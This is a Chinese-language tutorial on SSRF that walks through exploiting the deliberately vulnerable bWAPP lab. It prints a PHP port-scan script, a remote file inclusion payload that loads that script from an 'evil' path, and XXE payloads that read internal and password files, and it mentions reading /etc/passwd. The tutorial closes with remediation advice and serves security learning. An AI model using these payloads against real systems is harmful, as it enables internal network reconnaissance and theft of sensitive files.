什么是ssrf
ssrf(服务器端请求伪造)是一种由攻击者构造请求,由服务端发起请求的安全漏洞。
ssrf的攻击目标
外网无法访问的内部系统(由于请求是服务端发起的,所以服务端能请求到与自身相连而与外网隔离的内部系统)
漏洞原理
服务端提供了从其他服务器应用获取数据的功能但没有对目标地址做过滤与限制
ssrf利用存在缺陷的web应用作为代理攻击远程和本地服务器
主要攻击方式
- 对外网、服务器所在内网、本地进行端口扫描,获取一些服务的banner信息
- 攻击运行在内网或者本地的应用程序
- 对内网web应用进行指纹识别,识别企业内部的资产信息
- 攻击内外网的web应用,主要是使用HTTP GET请求就可以实现的攻击
- 利用file协议读取本地文件等
ssrf漏洞利用
使用bwapp利用ssrf漏洞
bwapp下载地址:
虚拟机下载地址:https://www.vulnhub.com/entry/bwapp-bee-box-v16,53/
文件下载地址:https://sourceforge.net/projects/bwapp/files/bee-box/
使用bee/bug即可登陆
使用远程文件包含进行端口扫描
点击Port scan 可以获得一份端口扫描的攻击脚本
<?php
/*
bWAPP, or a buggy web application, is a free and open source deliberately insecure web application.
It helps security enthusiasts, developers and students to discover and to prevent web vulnerabilities.
bWAPP covers all major known web vulnerabilities, including all risks from the OWASP Top 10 project!
It is for educational purposes only.
Enjoy!
Malik Mesellem
Twitter: @MME_IT
© 2013 MME BVBA. All rights reserved.
*/
echo "<script>alert(\"U 4r3 0wn3d by MME!!!\");</script>";
if(isset($_REQUEST["ip"]))
{
//list of port numbers to scan
$ports = array(21, 22, 23, 25, 53, 80, 110, 1433, 3306);
$results = array();
foreach($ports as $port)
{
if($pf = @fsockopen($_REQUEST["ip"], $port, $err, $err_string, 1))
{
$results[$port] = true;
fclose($pf);
}
else
{
$results[$port] = false;
}
}
foreach($results as $port=>$val)
{
$prot = getservbyport($port,"tcp");
echo "Port $port ($prot): ";
if($val)
{
echo "<span style=\"color:green\">OK</span><br/>";
}
else
{
echo "<span style=\"color:red\">Inaccessible</span><br/>";
}
}
}
?>
这个代码就不做过多的解释了
在choose your bug位置选择Remote & Local File Inclusion ,level选择low,在select a language位置,点击GO
可以看到
http://localhost/bWAPP/rlfi.php?language=lang_en.php&action=go
是一个很典型的文件包含
使用payload
POST:http://192.168.3.81/bWAPP/rlfi.php?language=http://192.168.3.81/evil/ssrf-1.txt&action=go
POST DATA:ip=192.168.8.1
成功获得结果
使用XXE获取敏感文件中的内容
点击Access获得XXE利用脚本
随后点击 XML External Entity Attacks (XXE)
使用burp抓包,并发送到repeater
使用http协议获取/bWAPP/robots.txt的内容
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY bWAPP SYSTEM
"http://192.168.3.81/bWAPP/robots.txt">
]>
<reset><login>&bWAPP;</login><secret>blah</secret></reset>
使用php协议获取/bWAPP/passwords/heroes.xml中的经过base64编码的数据
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY bWAPP SYSTEM
"php://filter/read=convert.base64-encode/resource=http://192.168.3.81/bWAPP/passwords/heroes.xml">
]>
<reset><login>&bWAPP;</login><secret>blah</secret></reset>
利用file获得bWAPP本机/etc/passwd的内容
ssrf漏洞修复建议
- 限制请求端口只能为web端口,只允许HTTP和HTTPS请求
- 限制不能访问内网的IP,以防止对内网进行攻击
- 屏蔽返回的详细信息
参考链接:
https://www.freebuf.com/column/157466.html